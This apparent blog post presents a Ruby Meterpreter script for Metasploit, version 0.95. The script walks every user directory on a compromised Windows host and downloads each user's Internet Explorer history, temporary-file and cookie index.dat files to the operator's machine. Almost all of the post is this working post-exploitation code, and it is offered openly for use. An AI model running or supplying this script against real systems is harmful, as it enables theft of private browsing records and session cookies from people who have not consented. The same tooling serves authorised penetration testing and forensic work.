Raj Web

A friend, Joseph Puran (blog here), and I worked on a simple Meterpreter script for the Metasploit Framework. One can use this script to quickly pull the dat files that IE uses to store history, temp file, and cookie information. This script is still a work in progress. Soon it will be modified to parse the dat files and return only the needed information. This script can also be generalized to pull any file from each user directory within a windows box.

#Rajendra Umadas
#Joseph Puran
#version 0.95

#This function will take in the path that holds the windows user folders.
#It will then enumnerate all of those folders and pull the IE history, cookies,
#and temporary internet dat files.
#It may seem pointless to make this a function now, however their are future revisions planned that will #generalize its use.

def pullRawData(path)
#All the pulled data will be stored in msfRoot/IE_Browser_History/[Timestamp]/
t = Time.now
folderPath= ‘IE_Browser_History’ + ::File::Separator + t.strftime(”%Y_%m_%d_%H_%M_%S”)
::FileUtils.mkdir_p(folderPath)

#For each item in the folder that contains user information
client.fs.dir.foreach(path) {|user|

#CHECK its not the . or .. ELSE look at next item
next if user =~ /^(\.|\.\.)$/
#CHECK that it is a directory ELSE look at next item
next if not client.fs.file.stat(path+user).directory?
#The below three blocks are wrapped between beging and end blocks to allow us to
#Rescue from an expection. This is needed because if we ever try to access a file
#or directory that doesnt exist, it will raise an exception. If we do not catch
#this expection our entire script will die. This may leave information on the
#machine that we could have gathered. This exception handeling also works with files
#or directories where we do not have permissions to access.

#This block will be used to pull the history.dat file
begin
history = path + user + “\\Local Settings\\History\\History.IE5\\index.dat”
pathPrefix = folderPath + ::File::Separator + user
client.fs.file.download_file(pathPrefix + “_history.dat”, history)
print_line(”Extracted IE History from: ” + user)
rescue
end

#This block will be used to pull the temporary internet files index.data
begin
tempFile = path + user + “\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat”
pathPrefix = folderPath + ::File::Separator + user
client.fs.file.download_file(pathPrefix + “_temp.dat”, tempFile)
print_line(”Extracted IE Temp Info from: ” + user)
rescue
end

#This block will be used to pull the cookies index.dat file
begin
cookies = path + user + “\\Cookies\\index.dat”
pathPrefix = folderPath + ::File::Separator + user
client.fs.file.download_file(pathPrefix + “_cookies.dat”, cookies)
print_line(”Extracted IE cookie info from: ” + user)
rescue
end

}
end

#Will implement other operations systems by passing in other base directories.
baseDir = “c:\\documents and settings\\”
pullRawData(baseDir)
#Will implement a parsing function to pull the important information out of the binary data pulled.